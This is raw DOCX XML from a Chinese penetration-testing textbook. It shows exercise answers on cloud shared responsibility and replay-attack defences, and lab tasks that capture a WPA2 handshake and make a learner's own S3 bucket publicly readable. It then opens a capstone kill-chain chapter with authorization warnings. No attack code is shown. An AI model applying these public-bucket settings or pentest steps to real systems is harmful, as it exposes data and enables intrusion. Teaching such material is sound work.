          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参考正文中对IaaS、PaaS、SaaS的层次划分，并结合“security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">cloud”与“security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">cloud”的经典区分。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">责任共担模型是指云服务商负责“云端本身的安全”（如物理安全、虚拟化层、网络隔离），而客户负责“云中的安全”（如操作系统配置、应用、数据、身份与访问管理）。以IaaS为例，CSP保障计算、存储、网络资源的可用性和底层安全，而客户负责从选择操作系统映像后的所有事项，包括漏洞修补、防火墙规则配置、IAM策略制定、数据加密等。任何一方未尽责均可能导致安全缺口。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如何从协议设计层面防止重放攻击？结合21.1节IoT重放与本节的云/Wi-Fi场景，给出防重放的通用原则。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">思考重放攻击成功的条件：攻击者能够重新提交一个在先前已有效的报文并获得期望效果。协议应如何感知报文的“新鲜度”？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防重放攻击的通用原则是引入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">时间相关或序列相关的动态因子</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，使每条消息具有唯一性和上下文绑定。具体技术包括：（a）随机数（nonce）挑战——每次会话使用全新随机数，同一nonce只能被接受一次，攻击者重放旧nonce的应答将因nonce不匹配而被拒绝；（b）时间戳——接收方检查时间窗口，过期报文丢弃，要求同步时钟且存在时间窗口安全边界；（c）序列号——双方维护递增的对话序号，重复序号或乱序包被拒绝；（d）一次性令牌（OTP或Totp）——认证消息包含仅单次有效的验证码。在WPA2四次握手中，ANonce和SNonce确保了每个会话的PTK是新鲜的，因此重放旧握手帧无法通过MIC验证。IoT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MQTT等协议若未启用随机客户端ID或nonce，则易受重放，应在应用层或传输层加入上述动态因子。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">迁移任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（设计给学习者，可在授权环境中验证）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在自有隔离的Wi-Fi实验环境中（例如使用废旧路由器搭建双机网络），用Wireshark捕获一次完整的WPA2-PSK四次握手，观察ANonce、SNonce字段以及EAPOL帧结构，不要进行实际破解。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在AWS或Azure免费层创建一个S3/Blob存储桶，尝试以下操作：先配置为Block</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Public </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Access完全阻断公共访问；再尝试将存储桶策略改为允许</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Principal: "*"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">s3:GetObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">操作，并使用AWS/CLI或SDK观察是否可以匿名访问。思考同一权限在不同资源类型（对象级别与桶级别）的配置审计应如何执行。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">请确保在实验后立即删除资源以避免费用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">21章从三个前沿专题纵深了攻击与防御的思维。IoT/硬件安全展示了物理暴露的调试接口与固件完整性如何成为新边界（21.1）；无线安全暴露了开放介质中协议设计的信任假设缺陷——四次握手的明文字段使离线PSK破解成为可能，而WPA3以密码学升级从协议层堵死了这条路径；云安全则打破了传统的硬件围墙，将安全职责拆分为清晰但易被误解的共担模型，错配暴露面（公开桶、松IAM）构成了当下最主流的云事件根源。本节的习题与迁移任务反复训练一个核心能力：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">在任何新技术面前，首先追问“信任被置于何处、该假设如何可能被违反”，然后用动态因子对抗重放、用最小权限对抗暴露面、用持续监控实现攻防对称。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读（白名单）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Sanders《Practical Packet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Analysis》：尤其是无线帧捕获与分析章节，帮助理解Wireshark对802.11管理帧的解析。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">AWS/Azure/GCP官方安全最佳实践文档（Security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Best Practices </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Whitepaper）：云服务商各自发布的配置检查清单与架构指引。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- OWASP IoT Top </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">10与Cloud-Native</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Security Top </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">10：提炼了IoT和云原生环境的十大设计缺陷与缓解措施。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- NIST SP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">800-53与800-171：提供了可映射到云安全中的安全控制基线。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Bejtlich《The Practice of Network Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Monitoring》：将无线入侵检测和云端网络流量监控纳入统一的网络安全监控框架。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="383"/>
    <w:bookmarkEnd w:id="384"/>
    <w:bookmarkStart w:id="386" w:name="综合实战-capstone完整-kill-chain"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">综合实战</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">capstone:完整</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kill-chain ★</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="385" w:name="capstone-实操从侦察到后渗透的完整链路"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22.1 capstone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实操:从侦察到后渗透的完整链路</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ★</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节为全书收官</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> capstone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的实操主干。它把前四卷所有攻击技术串联成一条完整的授权渗透测试</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">kill-chain，并在每一步强制给出防御对照——这是本书“攻防对称”教学底线的最高兑现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">【前置依赖与授权声明】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">交叉回指框（前置依赖）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">搭建靶机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：已见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（靶场搭建/VulnHub</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">导入）；本节假设读者已在隔离虚拟网络中部署一台授权的多漏洞靶机（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VulnHub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上的中等难度</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机，或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP Broken Web Applications </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">镜像），并通过仅主机（Host-Only）或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络与宿主机通信。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">侦察</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：复用第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描）、第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（服务枚举）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">突破</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：复用第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入）、第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（XSS）、第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 11 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（文件上传/LFI）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">getshell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：复用第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 17 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（Metasploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">手工</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">payload）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：复用第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 15 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限提升）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">后渗透与检测视角</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：复用第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 18 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（持久化/横向移动）及第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 19 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（检测工程）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络/系统底层</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：《从位到物联》Ch24–28（ARP/IP/TCP/TLS）、Ch13–18（栈帧/进程/内存/系统调用）已讲原理，本书直接使用，不再重讲。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">【授权与隔离声明框】</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; ⚠️</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">法律与伦理警告</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节所有命令、技术和流程仅限在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">读者自行搭建的隔离实验环境</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">官方授权靶机（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> VulnHub、HackTheBox、TryHackMe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">等平台上的授权机器）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">已获得书面授权的系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上执行。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实验网络必须与生产网络及互联网物理或逻辑隔离。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">未经授权访问、扫描、攻击他人系统是违法行为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。本书作者和出版商不对任何滥用行为承担责任。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="385"/>
    <w:bookmarkEnd w:id="386"/>
    <w:bookmarkStart w:id="404" w:name="capstone-实操从侦察到后渗透的完整链路-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22.1 capstone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实操：从侦察到后渗透的完整链路</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ★</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="387" w:name="实操动机一次完整的-kill-chain-演练"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22.1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实操动机：一次完整的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kill-chain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">演练</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">我们从攻击者和防御者两方视角来理解这次实操的意义。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者视角</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：一次真实的渗透测试（Penetration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Test）不是孤立地利用某个漏洞，而是遵循</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">kill-chain（杀伤链）方法论，从公开信息收集开始，逐步深入到目标网络内部，最终获取核心资产的控制权。本节以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Lockheed Martin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cyber Kill Chain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为指导思想，结合</w:t>
